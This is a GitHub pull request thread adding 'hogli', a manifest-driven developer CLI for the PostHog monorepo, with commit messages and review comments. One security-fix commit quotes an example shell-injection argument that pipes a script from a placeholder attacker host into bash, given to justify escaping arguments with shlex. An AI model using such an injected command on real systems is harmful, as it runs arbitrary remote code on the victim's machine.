feat(devex): hogli, unified developer CLI for PostHog monorepo

webjunkie opened the pull request:
## Summary

Introduce **hogli**, a unified CLI for PostHog developer workflows. Replaces scattered scripts with a single discoverable entry point. Wraps existing bin scripts, npm commands, and Django operations through a manifest-driven architecture.

Core principle: single `hogli` command instead of memorizing individual scripts.

`bin/start` → `hogli start`

## Installation

Works with or without Flox:

**With Flox (recommended):**
```bash
flox activate
hogli quickstart
```

**Without Flox:**
```bash
uv sync
bin/hogli quickstart
```

## Key Features

**Getting Started**
- `hogli quickstart` - essential commands for new developers
- `hogli --help` - categorized command list

**Daily Workflows**
- `hogli start` - launch full dev stack
- `hogli format` - format all code
- `hogli lint` - code quality checks
- `hogli migrations:run` - apply database migrations
- `hogli test:python <path>` - run Python tests
- `hogli dev:reset` - full environment reset

**File-Type-Specific Formatting**
- `hogli format:python`, `format:js`, `format:rust`, `format:yaml`, etc.

**Build Operations**
- `hogli build:schema` - schema generation pipeline
- `hogli build:grammar` - HogQL grammar

**Health Checks**
- `hogli check:postgres`, `check:clickhouse`, `services:ready`

## Architecture

- **Manifest-driven**: Commands defined in `hogli/manifest.yaml`
- **Auto-discovery**: Missing bin scripts trigger warnings
- **Composable**: Multi-step workflows (e.g., `dev:reset`)
- **Shell completion**: Auto-installed in Flox environments

**Command Types**
1. `bin_script` - delegates to shell scripts
2. `cmd` - runs direct commands (npm, ruff, pytest)
3. `steps` - orchestrates multiple hogli commands

**Example manifest**:
```yaml
migrations:
  migrations:run:
    bin_script: migrate
    description: Run all database migrations

quality:
  format:
    cmd: pnpm format
    description: Format backend and frontend code

compositions:
  build:schema:
    steps: [build:schema-json, build:schema-python, build:schema-latest-versions]
```

## Integration Points

**lint-staged (pre-commit hooks)**
- Python files: `hogli lint:python:fix && hogli format:python`
- All file types routed through hogli format commands

**package.json**
- `pnpm schema:build` → `hogli build:schema`
- `pnpm grammar:build` → `hogli build:grammar`
- Deprecated scripts marked with comments

**bin/ scripts**
- All existing scripts wrapped and auto-discovered
- `hogli meta:check` validates completeness (CI)

## Test Plan

- [x] `hogli --help` displays categorized commands
- [x] `hogli quickstart` shows getting-started workflow
- [x] `hogli start` launches full stack
- [x] `hogli migrations:run` applies migrations
- [x] `hogli format:python file.py` handles file arguments
- [x] Lint-staged integration works
- [x] Tab completion in bash/zsh
- [x] Auto-discovery adds missing bin scripts

## Documentation

See `hogli/README.md` for full architecture and extension guide.

webjunkie committed:
fix: make hogli CLI functional with syntax corrections and enhancements

fix typer argument decorators for test_python and test_js subcommands by removing None default values in Annotated typings, which conflicts with typer parameter handling

add hogli/__main__.py module entry point to support running as `python -m hogli`

fix flox environment integration by exposing hogli binary on PATH in manifest.toml activation hook

add typer dependency to pyproject.toml (0.13.1) since it's required by the CLI but was missing from dependencies

enhance version output with styled hedgehog ascii art and cyan/green colors for better CLI ux

add comprehensive test suite (hogli/test_cli.py) covering:
- main command help and version flags
- all test subcommands (python, js, all scopes)
- lint command with fix flag support
- fmt, build, check, services commands
- products discovery and listing
- error handling

webjunkie committed:
fix: redesign hogli around realistic dev workflows, never bundle slow tests

key changes:
- remove "all" scope from test command; developers must pick python OR js
- default test scope to "python" to prevent accidental slow operations
- remove test runs from "check" command; now only does lint + build (~5 min)
- add explicit guidance that tests take 15+ minutes and shouldn't run together
- update docs with design philosophy emphasizing fast feedback loops

rationale:
nobody runs all tests at once since they're too slow (30+ minutes). hogli should
only provide "all" for fast operations (lint/fmt). slow operations like tests
must be explicit and separate to prevent developers from accidentally starting
long-running processes. "hogli check" is now genuinely usable as a pre-push check.

webjunkie committed:
feat: add flat namespace with auto-discovered bin/ scripts via hogli CLI

implement dynamic command registration that loads scripts_manifest.yaml
and registers all 56 bin/ scripts as first-class hogli commands. developers
now see everything via "hogli --help" without worrying about the implementation
source—whether a command is natively in hogli or delegated to bin/ is invisible.

key additions:
- hogli/scripts_manifest.yaml: LLM-generated index of all bin/ scripts with
  descriptions, categories, and delegation flags
- dynamic _register_script_commands() that reads manifest at startup and
  creates typer commands for each script, preserving --help text and
  extra argument forwarding
- hedgehog ASCII art from repo asciiart file

benefits:
- unified discoverability: "hogli --help" shows all 56 available commands
  with descriptions in one place
- smooth migration path: scripts can be gradually absorbed into hogli
  or remain delegated without changing the CLI interface
- developers don't distinguish between "hogli commands" vs "bin/ scripts"—
  everything is just commands accessible via hogli

manifest includes categories: health-checks, start, deploy, build, docker,
migration, testing, tools, utilities

webjunkie committed:
add hedgehog ASCII art to hogli help output

webjunkie committed:
fix: remove ASCII art from help to avoid mingling with command list

webjunkie committed:
refactor: rename core commands to verb:noun with justification comments

make all commands self-documenting by using consistent verb:noun naming
with explicit prefixes where ambiguity exists.

core renamings:
- up → dev:up
- shell → env:shell
- check → qa:check
- lint → lint:check + lint:fix
- fmt → fmt:code
- migrate → db:migrate
- build → build:frontend
- services → docker:services:up/down
- test → test:python, test:js
- worktree → git:worktree
- products → products:list

each command includes justification comments explaining why the
naming improves clarity. developers no longer need to study help text
to understand what a command does. the naming is self-documenting.

webjunkie committed:
feat: add explicit cli_name to manifest, support colon-prefixed command naming

update scripts_manifest to support explicit cli_name field for clarity.
when cli_name is present, it takes precedence over auto-generation.

update registration logic to:
- check for explicit cli_name first
- fall back to intelligent auto-generation from category
- generate colon-prefixed names (check:clickhouse, start:backend, etc)

example cli_names added to health_checks category:
- check_clickhouse → cli_name: check:clickhouse
- check_dagster_graphql → cli_name: check:dagster-graphql
- check_hosts → cli_name: check:hosts

benefit: developers see organized, predictable command names:
hogli --help shows all commands grouped by verb:
- check:* (health checks)
- start:* (services)
- docker:* (container commands)
- deploy:* (deployments)
- etc

next step: add cli_names to remaining 53 scripts in manifest as needed.

webjunkie committed:
feat: add hogli-level command composition via YAML steps field

implement workflow composition that chains hogli commands sequentially.
developers can now define multi-step workflows in YAML instead of Python.

key additions:

1. steps field for command composition
   - list of hogli commands to execute in order
   - stops on first failure (no continue_on_error option)
   - enables declarative workflow definitions

2. cmd field for direct shell commands
   - alternative to bin_script for simple one-liners
   - could eventually move simple Python commands to YAML

3. refactored registration logic
   - supports three command types: bin_script, steps, cmd
   - extracted cli_name generation to _generate_cli_name()
   - cleaner separation of concerns

examples added to manifest:
- compositions:infra:ready - verify clickhouse, postgres, temporal
- compositions:quality:check - lint + build (no tests)
- direct_commands:git:status - example cmd field usage

benefits:
- yaml becomes source of truth for workflows
- reduces python boilerplate for simple commands
- enables non-developers to create workflows
- clear separation: python for complex logic, yaml for composition

next: audit and move simple env:shell, db:migrate, etc to yaml as applicable

webjunkie committed:
refactor: restructure manifest with CLI names as keys, remove dead config

Changes manifest structure so YAML keys are the CLI command names directly.
This removes the redundant cli_name field duplication and makes the manifest
cleaner. Also removes all delegate: true entries which served no purpose.

Moves env:shell command from Python to YAML cmd field as flox:activate,
which better reflects what the command actually does (calls flox activate).

Eliminates _generate_cli_name function since names now come directly from
manifest keys. All commands continue using colon-prefixed naming (check:*,
docker:*, etc) for consistent clustering in help output.

webjunkie committed:
feat: add categories command with category descriptions

Adds metadata to manifest with category titles and ordering, providing
a git-like help interface. Users can run 'hogli categories' to see all
commands organized by category with descriptions.

Each category has a human-friendly title ('Verify infrastructure readiness',
'Docker-based service orchestration', etc) matching Git's help format.

Categories are displayed in a consistent order with sorted commands within
each category.

webjunkie committed:
feat: fully dynamic categorized help using rich_help_panel

Adds automatic command categorization based on colon-prefixed command names.
Commands automatically appear in the correct help category without any
hardcoded Python mappings - everything is derived from the manifest structure.

Changes:
- Add _get_category_for_command() helper that infers category from command prefix
  by searching the manifest for commands with matching prefix
- Update all Python-defined commands to use rich_help_panel parameter
- Update _register_script_commands() to pass rich_help_panel for YAML commands
- Add all Python-defined commands to manifest with python_defined: true marker
- Add new code_quality category for lint and fmt commands
- Add core category (order 0) for top-level commands like dev:up and qa:check

Result: hogli --help now shows beautifully organized sections like:
  ╭─ Core development commands ──────────────────────────────────────────╮
  │ dev:up                         Start full PostHog dev stack...        │
  ╰──────────────────────────────────────────────────────────────────────╯

  ╭─ Code quality and formatting ────────────────────────────────────────╮
  │ lint:check                     Run code quality checks...            │
  ╰──────────────────────────────────────────────────────────────────────╯

Zero Python code changes needed to add/modify categories - all managed via YAML.

webjunkie committed:
refactor: migrate from Typer to Click with clean YAML-driven design

Complete migration to Click framework with minimal, focused implementation:

- Remove all hardcoded Python commands (dev:up, test:*, lint:*, fmt:code, etc)
- All commands now defined in scripts_manifest.yaml and dynamically registered
- Custom CategorizedGroup class formats help output with git-style categories
- Commands automatically categorized based on manifest structure
- Help output dynamically groups commands with proper ordering and titles
- Extract manifest loading to separate hogli/manifest.py module
- Remove all python_defined markers from YAML (no longer needed)

Key improvements:
- Smaller codebase: 269 lines vs 685 lines in Typer version
- Zero hardcoded commands: everything YAML-driven
- Clean separation: manifest.py handles discovery, cli.py handles CLI
- Dynamic categorization: categories inferred from command prefixes
- Fallback support: commands without categories appear under "commands" section

Entry points work:
- python -m hogli --help (shows categorized help)
- hogli <command> [args]
- Individual commands auto-discovered from manifest

webjunkie committed:
fix: update bin/hogli entry point for Click migration

Update the hogli script to import cli instead of app and reference Click instead of Typer.

webjunkie committed:
feat: add service directory and enhanced help with context

Add services directory to metadata documenting what each service does:
- Flox: reproducible development environments
- Docker: container isolation
- migration: database schema updates
- ClickHouse, PostgreSQL, Redis, Kafka, Temporal, Testing: etc

Commands now show enhanced help with three sections:
1. Description of what the command does
2. Service context (if matched by prefix or explicit services field)
3. Underlying command being executed

Example: `hogli flox:activate --help`
```
Enter Flox development environment shell.

Flox: Manages reproducible development environments. All developers get the
same exact versions of tools and dependencies.

Command: flox activate
```

Service matching logic:
- If `services: [...]` field in command → use explicit services
- Else if command prefix matches service name → auto-use that service
- Else → no service context shown

Implements option 5 help style as discussed.

webjunkie committed:
refactor: move command classes to separate module and simplify registration

extracted Command base class and subclasses (BinScriptCommand, DirectCommand, CompositeCommand) to hogli/commands.py to improve organization and reduce cli.py complexity. this makes the command architecture more testable and easier to extend.

simplified _register_script_commands() from ~115 lines of nested factory functions to ~45 lines of straightforward class instantiation. each command type now follows a consistent pattern: cmd = CommandClass(...); cmd.register(cli).

added hogli meta command to list all known services and their descriptions from the manifest. this provides discoverability of the infrastructure and concepts the CLI works with.

removed redundant imports from cli.py (os, subprocess, Path) since they're now in commands.py where they're used.

webjunkie committed:
feat: enhance meta command to show commands grouped by service

updated hogli meta to scan all commands and group them by service. now displays which commands use each service, either through explicit services array or prefix matching. this provides better discoverability of the infrastructure landscape.

added explicit services to check commands (check:clickhouse, check:postgres, check:kafka-clickhouse, check:temporal) so they appear in the service groupings.

webjunkie committed:
refactor: reimplement meta as service-grouped help view

changed hogli meta to display all commands sorted by service, matching the structure of hogli --help but with service organization. commands appear under each service they belong to, creating duplicates where a command uses multiple services (e.g., check:kafka-clickhouse under both ClickHouse and Kafka).

leverages get_services_for_command() to automatically determine service groupings from manifest, so it uses the same logic as the help formatting for consistency.

webjunkie committed:
refactor: convert manifest functions to Manifest class with singleton pattern

created Manifest class to encapsulate all manifest loading and discovery logic. this eliminates repeated load_manifest() calls and provides a cleaner API through properties (categories, services) and methods (get_category_for_command, get_services_for_command).

added singleton get_manifest() to provide lazy-loaded instance across the app. legacy convenience functions maintained for backwards compatibility so existing imports continue to work without changes.

benefits: single load, testable class structure, clearer concerns between configuration (manifest.py) and execution (commands.py).

webjunkie committed:
refactor: rename meta to concepts and simplify to service descriptions only

renamed hogli meta to hogli concepts to better reflect its purpose: showing infrastructure concepts that the CLI works with.

simplified output to only display service metadata (name and description) without listing commands. this provides lightweight documentation of what services/concepts exist in the system without command duplication.

webjunkie committed:
feat: add service relationships to start commands and concepts output

added explicit services to start:* commands (backend, celery, frontend, worker) so they map to the infrastructure they use. start command maps to all major services since it orchestrates everything.

enhanced hogli concepts to show which commands relate to each service. this provides discoverability without needing to reorganize the command structure - users can run 'hogli concepts' to see what commands to use for a given service.

webjunkie committed:
fix: use service keys instead of display names in start commands

corrected services arrays in start commands to use service key names (docker, temporal) instead of display names (Docker, Temporal). this ensures get_services_for_command() can properly match them to service metadata.

webjunkie committed:
refactor: normalize all service keys to lowercase

normalized service keys in metadata to lowercase (clickhouse, postgresql, redis, kafka instead of ClickHouse, PostgreSQL, Redis, Kafka) for consistency. updated all service references in command definitions to use lowercase keys.

this ensures consistent lookups throughout the system and makes the code more predictable.

webjunkie committed:
refactor: use yaml list instead of order fields for category ordering

converted categories from dict with redundant order fields to yaml list, leveraging yaml's insertion-order guarantee. simplified manifest.py by adding get_category_title() helper and updated cli.py's CategorizedGroup to respect list order.

used pythonic constructs: dict comprehensions for category mappings, generator expressions with next() for lookups, and list comprehensions for command rows.

webjunkie committed:
refactor: use pythonic idioms (generators, comprehensions, walrus operator)

converted imperative loops to pythonic patterns throughout the codebase:
- manifest.py: replaced for loops with next() + generators for category/service lookups
- manifest.py: used any() with generator for command prefix matching
- manifest.py: used list comprehension + walrus operator for service filtering
- commands.py: replaced for loop with extend() + generator expression
- commands.py: used walrus operator for description extraction
- cli.py: replaced nested loop with dict comprehension + reverse mapping
- cli.py: changed service_commands dict values from list to set for O(1) lookup

these patterns are more efficient and more idiomatic python.

webjunkie committed:
refactor: rename scripts_manifest.yaml to manifest.yaml

simplified the filename from scripts_manifest.yaml to manifest.yaml since it's already in the hogli package where the context is clear.

webjunkie committed:
feat: add hogli check command for manifest validation

added hogli check to validate that all bin scripts are documented in the manifest. exits with error code 1 if any scripts are missing, making it suitable for CI.

added hogli check --fix to generate scaffold manifest entries for missing scripts. this makes it easy to add new scripts without manually creating entries.

created validate.py module with:
- get_bin_scripts(): find all executable scripts, excluding entry points and config files
- get_manifest_scripts(): extract bin_script entries from manifest
- find_missing_manifest_entries(): identify scripts not in manifest
- generate_missing_entries(): create scaffold entries with TODO descriptions

excludes "hogli" entry point and config files (*.yaml, *.yml, *.env) from checks.

webjunkie committed:
refactor: auto-update manifest on every hogli invocation

changed manifest validation from explicit check command to automatic updates on every hogli invocation. when a bin script is missing from the manifest, hogli automatically adds a scaffold entry to the tools category with a TODO description.

kept hogli check command for CI validation: exits with code 1 if any scripts are missing, allowing CI to enforce manifest completeness without auto-update.

behavior:
- normal invocations (hogli concepts, etc): auto-add missing scripts, show info message
- hogli check: validate only, fail if any missing, useful for pre-commit hooks
- hogli help: skip validation

this prevents developers from accidentally introducing undocumented scripts while maintaining CI validation.

webjunkie committed:
refactor: remove unused args metadata and always allow extra args

removed all args: and allow_extra_args: fields from manifest.yaml. these were documentation-only metadata that had no effect on runtime behavior.

simplified BinScriptCommand to always allow extra args (remove conditional if/else). all commands now accept arbitrary arguments to pass through to their underlying scripts, matching common CLI patterns.

this reduces manifest size by ~60 lines and simplifies the command registration logic without changing functionality.

webjunkie committed:
refactor: rename check and concepts to meta: commands

renamed hogli commands to better reflect their purpose:
- check → meta:check: validates manifest for CI
- concepts → meta:concepts: shows infrastructure concepts

both commands are now grouped under the meta namespace for CLI metadata operations, keeping them separate from application commands. updated auto-update logic to skip meta:check validation.

webjunkie committed:
docs: flag composition scripts as candidates for hogli steps conversion

added TODO comments to manifest entries for bin scripts that are pure composition of other scripts:
- docker: runs migrate, docker-worker, docker-server
- docker:dev: runs migrate, runserver, start-worker, docker-frontend
- docker:dev-web: runs migrate, runserver, docker-frontend
- docker:worker: runs migrate-check, plugin-server, docker-worker-celery
- check:kafka-clickhouse: runs check_clickhouse_up after checking kafka

these are candidates for conversion to hogli steps-based composite commands instead of bin scripts.

webjunkie committed:
feat: expose high-level npm commands in hogli manifest

added high-level npm commands from package.json to hogli:
- build:schema: pnpm schema:build (orchestrates schema generation)
- build:grammar: pnpm grammar:build (orchestrates grammar generation)
- fmt:all: pnpm format (formats backend and frontend together)

all three marked with TODO comments in manifest as candidates for conversion to hogli steps format since they compose multiple high-level operations.

updated hogli docs with learnings from implementation:
- documented architecture (Click framework, manifest-driven discovery)
- guidelines for adding new commands
- command types (bin_script, cmd, steps)
- criteria for exposing npm commands (high-level workflow vs internal tooling)
- service metadata system
- CLI metadata commands (meta:check, meta:concepts)

all npm commands always accept extra args, allowing flexible parameter passing to underlying tools.

webjunkie committed:
feat: add PostHog-specific Django manage commands to hogli

Add high-level PostHog custom commands for developer discoverability:
- dev:setup - one-time local environment initialization
- dev:demo-data - generate test data for local testing
- tool:create-ch-migration - scaffold new ClickHouse migrations
- tool:print-hog-stl - reference HogSQL standard library

Only expose custom commands that are actually useful for dev workflows,
not standard Django commands that developers rarely use.

webjunkie committed:
feat: add dev:reset composition and mark bin/reset for deprecation

Add high-level hogli composition that orchestrates the full development
reset workflow:
  - Stop and restart Docker services
  - Wait for infrastructure services
  - Run migrations
  - Generate demo data
  - Sync feature flags

This replaces the standalone bin/reset script and demonstrates hogli's
ability to compose workflows from smaller commands. Developers can now
use `hogli dev:reset` instead of memorizing the script path.

Marked bin/reset with TODO for future deprecation once hogli is the
primary developer interface.

Also added:
  - migration:sync-feature-flags command (python manage.py sync_feature_flags)
  - Proper description for auto-discovered reset bin script

webjunkie committed:
feat: add quickstart command and improve hogli UX

Add `hogli quickstart` command that displays essential getting-started
commands for new developers. Shows:
  - How to get PostHog running locally (4 steps)
  - Daily development workflows
  - Where to find full command list

Reorder category list in manifest by developer frequency:
  core → start → health_checks → migration → testing → code_quality
  → build → docker → deploy → tools → utilities → compositions → environment

This puts everyday workflows first and infrastructure/meta last, making
the `hogli --help` output more useful for active development.

Fix naming typo: rename all `utilitie:*` commands to `utilities:*`
  - utilities:posthog-worktree
  - utilities:phw
  - utilities:update-bots-list
  - utilities:dump-hogvmrs-stl
  - utilities:hobby-ci

Update docs/hogli.md with getting started section that points to
`hogli quickstart` and clarifies command names (test:python not test python).

webjunkie committed:
refactor: comprehensive hogli command naming cleanup

Simplify and clarify command names for better developer ergonomics:

RENAMES:
  - migration → migrations (migration:migrate → migrations:run, etc)
  - testing → tests (testing:tests → tests:run, etc)
  - fmt:all → format (singleton, no prefix)
  - fmt:code → removed (redundant)
  - lint:check → lint (shorter for daily use)
  - code_quality → quality (category)
  - quality:check → precommit (composition)
  - infra:ready → services:ready (composition)

DEPRECATIONS (marked in help):
  - docker:* (docker, docker:dev, docker:dev-web, docker:backend, docker:frontend,
    docker:migrate, docker:worker) → use start:* or migrations:run instead
  - Kept: docker:services:*, docker:server*, docker:worker-*, docker:ai-evals

NEW COMMANDS:
  - format:staged - runs pnpm lint-staged (for pre-commit hook discoverability)

LINT-STAGED INTEGRATION:
  Updated package.json lint-staged config to invoke hogli commands:
    - Python files now call `hogli lint:fix` and `hogli format`
    - Other files continue using native tools

KEEP:
  - check:* commands (map 1:1 to bin scripts, developers know them)
  - All existing start:* commands
  - docker:services:* (essential for dev environment)
  - build:* and schema/grammar at top-level
  - All utilities:* commands

This makes the CLI more discoverable and developer-friendly by:
- Reducing cognitive load (common commands don't have double colons)
- Showing deprecation path for old Docker commands
- Enabling lint-staged to call hogli for Python code (1:1 with native tools)
- Keeping the manifest as single source of truth

webjunkie committed:
refactor: make DirectCommand accept extra arguments

Update DirectCommand to support passing through extra arguments (like file paths)
to shell commands, similar to how BinScriptCommand works. This enables:
  - hogli format:yaml file1.yaml file2.yaml
  - hogli format:python file.py
  - lint-staged to call hogli commands with file paths

DirectCommand now:
  - Registers with allow_extra_args=True context setting
  - Accepts *args in execute()
  - Appends args to the command before running

This allows manifest cmd: entries to work seamlessly with tools that pass
arguments (like lint-staged), making all format/lint commands fully
discoverable and usable via hogli.

webjunkie committed:
fix: rename lint:fix:python to lint:python:fix for naming consistency

Make command naming consistent with format:TYPE pattern.
All lint and format commands now follow: action:type:optional-detail

webjunkie committed:
docs: mark build:schema and build:grammar as steps conversion candidates

Add TODO comments to build:schema and build:grammar commands indicating
they are candidates for conversion to hogli steps, since they orchestrate
multiple sub-commands via npm scripts.

webjunkie committed:
feat: convert build:schema and build:grammar to hogli compositions

Add hogli compositions for multi-step build workflows:
  - build:schema - orchestrates schema-json, schema-python, and latest-versions steps
  - build:grammar - wraps pnpm grammar:build

Update package.json scripts to call hogli commands with fallback:
  - schema:build: 'hogli build:schema || (original npm commands)'
  - grammar:build: 'hogli build:grammar || (original npm commands)'

This enables discovery and manual execution of these workflows via hogli
while maintaining backward compatibility with direct npm calls.

Moved build:schema and build:grammar from build commands to compositions.

webjunkie committed:
refactor: delegate schema:build and grammar:build to hogli only

Update package.json to call hogli commands directly:
  - pnpm schema:build now runs: hogli build:schema
  - pnpm grammar:build now runs: hogli build:grammar

DEPRECATION: These npm scripts are now thin wrappers around hogli compositions.
Developers should prefer 'hogli build:schema' and 'hogli build:grammar' directly.
The npm scripts remain for backward compatibility with existing CI/tooling.

This makes build orchestration fully discoverable and runnable via hogli.

webjunkie committed:
docs: move hogli documentation to hogli/README.md

Move developer documentation from docs/hogli.md to hogli/README.md
to keep tool documentation alongside the tool itself.

Simplify format:markdown to use prettier only (markdownlint can be
added separately if needed).

webjunkie committed:
fix: add shebang to build-schema-latest-versions.py script

webjunkie committed:
fix: use pnpm for npm-based tools and support shell operators in DirectCommand

webjunkie committed:
feat: add shell completion for hogli with auto-install in flox environments

webjunkie committed:
fix: install hogli completions in flox environment cache and add to shell profiles

webjunkie committed:
fix: use venv python for completion generation and move after uv sync

webjunkie committed:
fix: add compinit to reinitialize zsh completions

webjunkie committed:
fix: move venv activation before completion setup in zsh profile

webjunkie committed:
fix: generate zsh completions dynamically from hogli --help to support colons

webjunkie committed:
fix: use tab separator in zsh completions instead of colon

webjunkie committed:
fix: escape square brackets in zsh completions

webjunkie committed:
fix: generate completions from manifest instead of parsing help output

webjunkie committed:
fix: use tab separator in zsh completions for colon-separated command names

webjunkie committed:
fix: escape colons in command names for zsh completions

webjunkie committed:
security: fix command injection vulnerability in DirectCommand

The DirectCommand.execute() method was vulnerable to shell injection when
user-supplied arguments were concatenated into commands executed with shell=True.

Attack scenario: An attacker could craft arguments like:
  hogli format:css "; curl attacker.com/steal.sh | bash"

This would bypass the intended command and execute arbitrary shell code.

Fix: Use shlex.quote() to properly escape all user-supplied arguments before
concatenating them into shell command strings. This ensures special shell
characters are safely quoted and interpreted literally rather than as shell
operators.

The fix preserves all existing functionality while preventing shell injection
attacks through argument passing.

webjunkie committed:
fix: rename docker: command to docker:deprecated to fix completion formatting

The bare 'docker:' command name (with trailing colon) was causing zsh
completion to display incorrectly, showing multiple commands on same line.
Renamed to 'docker:deprecated' to maintain consistent colon-prefixed naming.

webjunkie committed:
fix: rewrite CLI tests for Click API and manifest-driven commands

Replaced outdated Typer-based tests with Click testing framework. Tests now
properly validate the manifest-driven command registration system and include
coverage for command injection prevention through proper argument escaping.

Fixes P0 issue where test imports were failing due to non-existent Typer
objects. New tests are simpler and focus on verifying CLI behavior rather
than internal command implementations.

webjunkie committed:
fix: correct command references in quickstart help text

Updated quickstart command to reference actual manifest commands:
- migration:migrate → migrations:run
- fmt:all → format
- qa:check → lint
- test:python → tests:python
- test:js → tests:js

Fixes bot-identified issue where quickstart was referencing non-existent commands.

webjunkie committed:
fix: use shlex.split() for proper quoted argument handling in DirectCommand

Changed naive cmd_str.split() to shlex.split() when parsing direct shell
commands without operators. This properly handles quoted arguments and preserves
argument boundaries.

The shlex.quote() fix for shell=True context was already applied for commands
with && or || operators. This change handles the non-shell path.

Fixes bot-identified issue where commands with quoted arguments would break.

webjunkie committed:
fix: add missing command implementations to manifest

Added missing cmd or bin_script fields for:
- build:frontend: pnpm frontend build command
- db:migrate: bin_script delegate to migrate
- tests:python: pytest command
- tests:js: pnpm frontend test command
- docker:services:up/down: docker compose commands

Removed incomplete placeholder commands:
- git:worktree: no implementation available
- products:list: no implementation available

Fixes bot-identified issues where commands in manifest lacked executable
definitions, preventing them from being registered as working commands.

webjunkie committed:
fix: revise quickstart to match actual hogli start workflow

Updated quickstart to accurately reflect how hogli start orchestrates the full
development setup via mprocs. Simplified the getting started path:
- dev:setup for one-time initialization
- hogli start for full stack (replaces separate docker/migrations/start steps)
- Optional demo data generation

Added --minimal flag option for faster iteration on resource-constrained systems.
Better aligns with handbook guidance on local development setup.

webjunkie committed:
fix: simplify quickstart to reflect actual hogli start behavior

Analyzed mprocs.yaml and discovered hogli start is a complete orchestrator
that automatically:
- Starts Docker services (docker-compose process)
- Runs all database migrations
- Launches backend, frontend, workers with health checks

Updated quickstart to show the actual workflow:
- Single command: hogli start
- Opens http://localhost:8010 when ready
- Optional flags and common development commands

This matches handbook guidance and makes onboarding much clearer by showing
the simplicity of hogli's all-in-one orchestration.

webjunkie committed:
chore: replace typer with click in dependencies

Typer is no longer used - hogli CLI is built with Click. Replace the Typer
dependency with an explicit Click dependency (using compatible version ~=8.0)
so hogli's runtime requirement is clear.

webjunkie committed:
chore: remove accidentally committed asciiart file

The ASCII art is already embedded in hogli/cli.py as HEDGEHOG_ART constant
and displayed in the quickstart command. No need for a separate file.

webjunkie committed:
fix: restore unrelated flox configuration we accidentally removed

Restore RUST_LOG lines, log cleanup script, and fix typo we introduced.
Only our hogli completion additions should have been changed - the rest
of the flox configuration was unrelated to hogli work.

webjunkie committed:
docs(hogli): clean up README and fix command references

Remove outdated sections:
- Command mapping table (had incorrect command names, redundant with --help)
- Product utilities section (too niche for main README)
- Branch switching & worktrees section (references old phw workflow)
- Shell completions section (referenced Typer's --install-completion, but hogli uses Click and completions are auto-installed via flox hooks)

Update command references throughout:
- hogli qa:check → hogli lint (qa:check doesn't exist in manifest)
- hogli test:python → hogli tests:python (correct manifest name)
- hogli test:js → hogli tests:js (correct manifest name)
- Remove "(equivalent to the older hogli check)" outdated note

Keep "Extending the CLI" section as requested - it documents how to add new commands.

webjunkie committed:
docs(hogli): add decision tree for choosing command implementation approach

Replace "Adding a new command" with comprehensive decision tree showing 4 ways to add commands:
1. Click command in cli.py - for meta/framework operations (quickstart, meta:check)
2. Manifest with steps - orchestrates hogli commands (dev:reset)
3. Manifest with bin_script - shell scripts with logic (check:postgres, migrate)
4. Manifest with cmd - simple shell one-liners (lint, format, docker commands)

Include guideline for trivial Python: 3-5 lines of framework-related logic can go in cli.py, but workflow commands should use manifest approach.

Reorganize "Command types" into "Command type reference" with concrete examples for each approach including Python example for cli.py commands.

Clarify npm command exposure guidelines - only high-level workflows, not implementation details.

webjunkie committed:
docs(hogli): add non-Flox installation instructions

Document that hogli works without Flox by running `uv sync` and using `bin/hogli` directly.

Clarify that Flox adds hogli to PATH via symlink, while non-Flox users can either use `bin/hogli` directly or add `bin/` to their PATH.

webjunkie commented:
@mariusandra This is mostly it for now, I guess.... 

What was the E2E command that you are frequently running?

webjunkie commented:
@rafaeelaudibert thought you might be interested in this. Idea is, as per PostHog moving fast culture, to merge this and then iterate. But I thought it cannot hurt to ask specific people for some feedback first.

rafaeelaudibert commented:
The first time I proposed something like this, people told me `pnpm` + custom scripts in the root `package.json` was the right way to do this. I still think *this* is the right way to do it, so I'm more than happy to see this.

One problem I have is: some people are using flox, some aren't. We should probably move everyone to use `flox` and kinda of force-adopt this.

Will leave comments on the actual code, but I'm more than happy to be a guinea pig and test this

rafaeelaudibert commented on hogli/cli.py:
```diff
@@ -0,0 +1,269 @@
+from hogli.commands import BinScriptCommand, CompositeCommand, DirectCommand
+from hogli.manifest import REPO_ROOT, load_manifest
+
+HEDGEHOG_ART = r"""
```
nit, not an attack to your design skills: Not the biggest fan of this one, there's a cool one being used in the Array product, maybe we could standardize and use the same one?

rafaeelaudibert commented on .flox/env/manifest.toml:
Should this be updated to use `hogli` commands rather than bin/ commands? Of course, once we've fully migrated

webjunkie commented:
> We should probably move everyone to use flox and kinda of force-adopt this.

Yes... seems it's stable and I wanted to focus local devex on one path to make things simpler. I planned to remove non-flox stuff from developping locally guide as well, but then got kinda off track in seeing if I can get #38584 done

webjunkie committed:
feat(hogli): add hidden field to hide commands from help output

Implement visibility system to declutter help output while maintaining backward compatibility.

Key changes:
- Add `hidden: true` field to manifest for commands to hide from --help
- Update CategorizedGroup.format_commands() to skip hidden commands
- Store config on Click command objects for visibility filtering
- Auto-discovered commands marked hidden by default until reviewed
- Hidden commands remain fully callable, just not advertised

Commands marked as hidden (26 total, reducing help from 77 to 51 commands):

**Deprecated (7):** docker:deprecated, docker:dev, docker:dev-web, docker:backend, docker:frontend, docker:migrate, docker:worker - all superseded by start commands

**Production-only (5):** docker:server, docker:server-unit, docker:worker-beat, docker:worker-celery, tool:unit-metrics - not used in local dev

**Duplicates/aliases (2):** db:migrate (use migrations:run), dev:up (unclear vs start)

**Specialist/advanced (12):** utilities:dump-hogvmrs-stl, utilities:install-hogli-completion, utilities:phw, utilities:posthog-worktree, utilities:update-bots-list, utilities:hobby-ci, tool:print-hog-stl, tool:ty, check:hosts, check:dagster-graphql, check:video-deps, docker:ai-evals, flox:activate

Benefits:
- Cleaner help output for new users (51 essential commands vs 77)
- Backward compatibility (hidden commands still work)
- Deprecation path (hide first, remove later)
- Safety for auto-discovery (new bins hidden until reviewed)

Documentation updated with hiding guidelines and examples.

webjunkie committed:
refactor(hogli): address Rafa's PR feedback

Based on review from @rafaeelaudibert:

**1. Remove bin/reset redundancy**
- Delete bin/reset file (recently added, safe to remove)
- Remove reset: entry from manifest
- Keep dev:reset composition which provides same functionality

**2. Hide individual start commands**
- Add hidden: true to start:backend, start:celery, start:frontend, start:frontend-vite, start:worker, start:rust-service
- Keep main 'start' command visible (mprocs orchestrator)
- Aligns with Rafa's philosophy: "all of the dev environment should be run from inside mprocs"
- Advanced users can still use hidden commands directly

**3. Rename test commands to singular**
- tests:python → test:python
- tests:js → test:js
- tests:run → test:run
- tests:e2e → test:e2e
- Update quickstart and README examples
- Follows git convention (git test, not git tests)

**4. Clean up manifest TODOs**
- Remove test:new:script and new:tool entries with TODO descriptions

**Result:**
- Help output cleaner (6 more commands hidden, now 45 visible)
